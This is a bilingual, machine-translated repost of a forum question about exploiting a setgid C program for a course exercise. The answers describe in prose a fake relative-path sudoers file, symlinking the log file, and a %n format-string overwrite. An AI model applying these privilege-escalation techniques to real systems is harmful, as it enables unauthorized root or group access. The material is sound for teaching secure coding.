利用C-Linux setuid和系统命令
[英]Exploiting c - linux setuid and system commands
问题描述
I have the following code as an executable that I want to exploit for a course in order to spawn a shell with elevated privileges. 
我将以下代码作为可执行文件,希望将其用作课程,以便生成具有提升特权的shell。 I am a user of levelX and the executable has setgid of levelX+1. 我是levelX的用户,可执行文件的setgid为levelX + 1。 I am not allowed to alter any of the code. 我不允许更改任何代码。 As I do not have root privileges, setguid(0) fails. 由于我没有root权限,因此setguid(0)失败。 I was not able to change the return address of the function or main function. 我无法更改函数或主函数的返回地址。 Could anyone point to the right direction? 谁能指出正确的方向?
int main (int argc, char** argv)
{
if (exec(argv[1]) != 0)
{
fprintf(stderr, "Cannot execute your command\n");
return -1;
}
return 0;
}
int exec(char *command)
{
FILE *f = NULL;
char entry[64];
char line[256];
f = fopen("log", "a");
if (f == NULL)
{
fprintf(stderr, "Can't open file\n");
return -1;
}
snprintf(entry, 64, "%d: %s\n", getuid(), command);
fprintf(f, entry, NULL);
fclose(f);
f = fopen("sudoers", "r");
if (f == NULL)
{
fprintf(stderr, "Can't open\n");
return -1;
}
while(fgets(line, 256, f) != NULL)
{
if (atoi(line) == getuid())
{
if (setuid(0) == 0) {
system(command);
} else {
fprintf(stderr, "check permissions\n");
}
fclose(f);
return 0;
}
}
fprintf(stderr, "Error\n");
fclose(f);
return -1;
}
2 个解决方案
解决方案1
1 2018-11-22 12:33:13
From the code you posted, it appears you are supposed to write your own sudoers file to any directory you have write access to, then run this program in that directory, so it reads your file. 从发布的代码中,您似乎应该将自己的sudoers文件写入您具有写访问权限的任何目录,然后在该目录中运行该程序,以便它读取您的文件。
So, simply write your own UID to this fake sudoers file, and then give a command parameter such as bash to get a shell. 因此,只需将您自己的UID写入此伪造的sudoers文件中,然后提供命令参数(如bash即可获取shell。 There's no need to do any buffer overflow exploitation. 无需进行任何缓冲区溢出利用。
Presumably the real exploitable program has suid bit set in the file permissions, so it can perform the setuid(0) call. 大概真正的可利用程序在文件许可权中设置了suid位,因此它可以执行setuid(0)调用。 I guess the purpose of the exercise is to demonstrate how all input needs to be sanitized when you are dealing with suid programs, including things like relative paths (which effectively take current working directory as input) like any user-supplied paths and other input. 我想该练习的目的是演示在处理suid程序时如何清理所有输入,包括诸如相对路径(有效地将当前工作目录作为输入)之类的东西,例如任何用户提供的路径和其他输入。
But, since the program only has setgid bit (as said in comment), you need find something you do with just the group id. 但是,由于该程序仅具有setgid位(如注释中所述),因此您需要仅使用组ID进行查找。 That something could be that log file write. 可能是该日志文件写入了。 You could create a symbolic link with file name log , pointing to whatever file you want to append to, which that group has write permissions for. 您可以使用文件名log创建一个符号链接,指向要添加到该文件组具有写权限的任何文件。 Also, that file needs to have format such, that the log line format does not make the file corrupted. 同样,该文件需要具有这样的格式,即日志行格式不会使文件损坏。 Remember, you can put newlines etc into command line arguments! 请记住,您可以在命令行参数中添加换行符!
解决方案2
0 已采纳 2018-12-11 20:27:11
After all it was a format string exploit on fprintf(f, entry, NULL); 毕竟,这是对fprintf(f, entry, NULL);的格式字符串的利用fprintf(f, entry, NULL); inside int exec(char *command) where you overwrite the return address with %n format. 在int exec(char *command) ,您以%n格式覆盖返回地址。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.